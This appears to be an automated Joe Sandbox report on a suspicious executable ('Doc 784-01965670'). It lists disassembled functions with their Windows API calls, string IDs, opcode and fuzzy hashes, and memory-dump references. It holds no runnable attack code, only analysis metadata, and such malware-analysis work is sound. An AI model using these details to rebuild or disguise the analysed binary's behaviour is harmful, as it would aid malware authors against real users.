                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoItemMenu_memset
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2223754486-4108050209
                                                                                                                                    • Opcode ID: 4788cf6f182db8212a4dd4ca04636ab1929000af0f3277abda7ed9995d735732
                                                                                                                                    • Instruction ID: 143d79469fb3e570aa9bb1e7a79db7ad77638f8ab3c2e89d41e08a42c99b444e
                                                                                                                                    • Opcode Fuzzy Hash: 4788cf6f182db8212a4dd4ca04636ab1929000af0f3277abda7ed9995d735732
                                                                                                                                    • Instruction Fuzzy Hash: CB3101721043009BF3249F18DC85BABBBE4EBC6310F14081FFA90C62A0E379D949C75A
                                                                                                                                    Function 00448358 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0044846C
                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0044847E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: '
                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                    • Opcode ID: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                    • Instruction ID: cecdca06d5aa7ecc7109d5e1ff25192cbd540bafe2d1ef24ff7c1b98f096cb5f
                                                                                                                                    • Opcode Fuzzy Hash: 40c115dbe3bb232f42185e8835a3c48b8da925c0788aed463fb6e16a301179a8
                                                                                                                                    • Instruction Fuzzy Hash: 984179706083459FE710CF18C880BABB7E1FB89700F54882EF9888B351DB75A841CF5A
                                                                                                                                    Function 00444571 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                    • Opcode ID: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                    • Instruction ID: 268d240ecd79f719a1425e83c09d650ed443e1bf0ac8ef4f8d51517adc50c1d2
                                                                                                                                    • Opcode Fuzzy Hash: b6c602b1dd263d2c99a5ec9127bd928e029cd45f71d746a48c0c49a5726287e2
                                                                                                                                    • Instruction Fuzzy Hash: B6210D765042206BEB15DF08D844B97B7A4FBDA310F44492BEE9897250D379E848C7AA
                                                                                                                                    Function 0045126C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00451305
                                                                                                                                    • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00451313
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: Combobox
                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                    • Opcode ID: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                                    • Instruction ID: f266216a818347eeb58d59163185d0479ace604409515c443b0f4894c7ad90f2
                                                                                                                                    • Opcode Fuzzy Hash: 0499e5d8541f4f9e55005c4c3969ca7e279e19a534152943b96dd4c6f47caa3c
                                                                                                                                    • Instruction Fuzzy Hash: D9110A72A0430067E6109AA4DC80F5BB3D8EB99735F10071BFA24E72E1D774FC448768
                                                                                                                                    Function 004515AB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 004515DA
                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 004515EA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                    • String ID: edit
                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                    • Opcode ID: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                                    • Instruction ID: b80de1f22085cd2d24dcce0fe83431d10f7d2aff66e66183492c5b70af3c9e13
                                                                                                                                    • Opcode Fuzzy Hash: 255065f22875c24af3de74cb0bd99753dbe1335258aa39c92c973eb9156a9169
                                                                                                                                    • Instruction Fuzzy Hash: 2011E4716003006BD6109A64D884F6BB3DCEBD8335F104B1EFA61D32E1D779EC458729
                                                                                                                                    Function 00474827 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00474833
                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 00474846
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                    • Opcode ID: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                                    • Instruction ID: 41c327e25453105c4ca6c880754d33c67e761007402a238c65fd2e715fefe222
                                                                                                                                    • Opcode Fuzzy Hash: 6b539aa5d60aaa410447b6e5f9627e9a7b549f395ce9a021d490b3e8c5b2361e
                                                                                                                                    • Instruction Fuzzy Hash: 4421C230929A14B7C2107F6ABD4BB5E7BB8AF44716F008C5DF5C562094DF785268836F
                                                                                                                                    Function 004647A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: htonsinet_addr
                                                                                                                                    • String ID: 255.255.255.255
                                                                                                                                    • API String ID: 3832099526-2422070025
                                                                                                                                    • Opcode ID: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                                    • Instruction ID: e3b5e028fda38c0aed97ec3d425ece65e45bc088e5f3683a6f0e3ee8de0e9224
                                                                                                                                    • Opcode Fuzzy Hash: 8f81358a7508e033a1ccca041802c5cf6ea433113977ffec7d790c03bda6a3ba
                                                                                                                                    • Instruction Fuzzy Hash: 6F11253620030057DA10EB69C882F9BB394EFC4728F00896BFA105B283D679F45A832E
                                                                                                                                    Function 004694DE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • SendMessageW.USER32(00000000,000001A2,000000FF,00000000), ref: 00469547
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 455545452-1403004172
                                                                                                                                    • Opcode ID: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                    • Instruction ID: d7878a024921556205560296ec06e6abf53b779169672b4943ab7ad66f70e2c7
                                                                                                                                    • Opcode Fuzzy Hash: 19b239a33d6ccea3c1be09f9a3ff48f3ef4fb117e78275193105084191351ab7
                                                                                                                                    • Instruction Fuzzy Hash: 2601D6327011106B8600BB299C019AFB39DDBC2370F544A2FF965573D1EA39AC0E476A
                                                                                                                                    Function 00442AFE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00442B8C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InternetOpen
                                                                                                                                    • String ID: <local>
                                                                                                                                    • API String ID: 2038078732-4266983199
                                                                                                                                    • Opcode ID: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                                    • Instruction ID: 525aca290fb55aeb65c4bf55ca0deee88c9418ef2a1db54778758d1eb2e06c8a
                                                                                                                                    • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                                    • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                                                                    Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 455545452-1403004172
                                                                                                                                    • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                    • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                                                                    • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                                    • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                                                                    Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 455545452-1403004172
                                                                                                                                    • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                    • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                                                                    • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                                    • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                                                                    Function 00461774 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _strncmp
                                                                                                                                    • String ID: ,$UTF8)
                                                                                                                                    • API String ID: 909875538-2632631837
                                                                                                                                    • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                                    • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                                                                                    • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                                    • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                                                                                    Function 00461772 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _strncmp
                                                                                                                                    • String ID: ,$UTF8)
                                                                                                                                    • API String ID: 909875538-2632631837
                                                                                                                                    • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                                    • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                                                                                    • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                                    • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                                                                                    Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • wsprintfW.USER32 ref: 004560E9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend_mallocwsprintf
                                                                                                                                    • String ID: %d/%02d/%02d
                                                                                                                                    • API String ID: 1262938277-328681919
                                                                                                                                    • Opcode ID: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                                                    • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                                                                    • Opcode Fuzzy Hash: dc5fd9a877cd0fc352ed6de9b5f97ee6fb2dcbb154e3a48ad4a1e49fbb654ae8
                                                                                                                                    • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                                                                    Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                                                      • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                    • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                    • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                                                    • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                                    • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                                                    Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                                    • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                                      • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                                                                    • String ID: Shell_TrayWnd
                                                                                                                                    • API String ID: 529655941-2988720461
                                                                                                                                    • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                    • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                                    • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                                    • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
